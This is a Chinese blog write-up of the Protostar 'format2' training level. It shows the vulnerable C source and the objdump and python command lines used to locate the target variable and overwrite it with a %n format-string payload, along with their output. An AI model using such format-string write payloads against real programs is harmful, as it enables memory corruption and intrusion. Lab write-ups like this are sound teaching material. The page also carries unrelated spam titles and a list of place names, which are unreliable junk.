亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Protostar format2

發布時間:2020-07-07 15:06:38 來源:網絡 閱讀:507 作者:terrying 欄目:安全技術

About

This level moves on from format1 and shows how specific values can be written in memory.
This level is at /opt/protostar/bin/format2

Source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln()
{
char buffer[512];

fgets(buffer, sizeof(buffer), stdin);
printf(buffer);

if(target == 64) {
    printf("you have modified the target :)\n");
} else {
    printf("target is %d :(\n", target);
}
}

int main(int argc, char **argv)
{
vuln();
}

這題與上題有點區別:1、傳參改為fgets;2、target=64
同樣需要找到target的位置
user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep target
080496e4 g         O .bss     00000004                            target

同樣先找出賦值動作的位置:
user@protostar:/opt/protostar/bin$ python -c 'print "aaaaaaaa"+"%x."*150' | ./format2
aaaaaaaa200.b7fd8420.bffff624.61616161.61616161.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.a2e78.b7eada75.b7fd7ff4.80496b0.bffff7c8.8048338.b7ff1040.80496b0.bffff7f8.80484f9.b7fd8304.b7fd7ff4.80484e0.bffff7f8.b7ec6365.b7ff1040.bffff7f8.80484c6.80484e0.0.bffff878.b7eadc76.1.bffff8a4.bffff8ac.b7fe1848.bffff860.ffffffff.b7ffeff4.8048285.1.bffff860.b7ff0626.
target is 0 :(

nice,這次很近。同樣確認一下位置:
user@protostar:/opt/protostar/bin$ python -c 'print "aaaaaaaa%x%x%x%x"' | ./format2
aaaaaaaa200b7fd8420bffff62461616161
target is 0 :(
按照上一題的做法看看會發生什么事情 :
user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08aaaa%x%x%x%n"' | ./format2
aaaa200b7fd8420bffff624
target is 27 :(
OK,這里已經成功更改了target的值了,題目要求是64,只需要將%x固定長度輸出即可:
user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08aaaa%40x%x%x%n"' | ./format2
aaaa                                                                         200b7fd8420bffff624
you have modified the target :)




向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

罗平县| 四平市| 赤水市| 新巴尔虎右旗| 金门县| 亚东县| 剑阁县| 自贡市| 隆回县| 镇平县| 孝义市| 无锡市| 连云港市| 霍邱县| 崇信县| 洪江市| 巴彦淖尔市| 克东县| 大名县| 平利县| 凉城县| 寻乌县| 景洪市| 二手房| 公安县| 湄潭县| 米易县| 库尔勒市| 扶余县| 万山特区| 宝坻区| 怀安县| 宁陕县| 达州市| 海阳市| 宝山区| 伊吾县| 灌阳县| 黄浦区| 孟连| 汝阳县|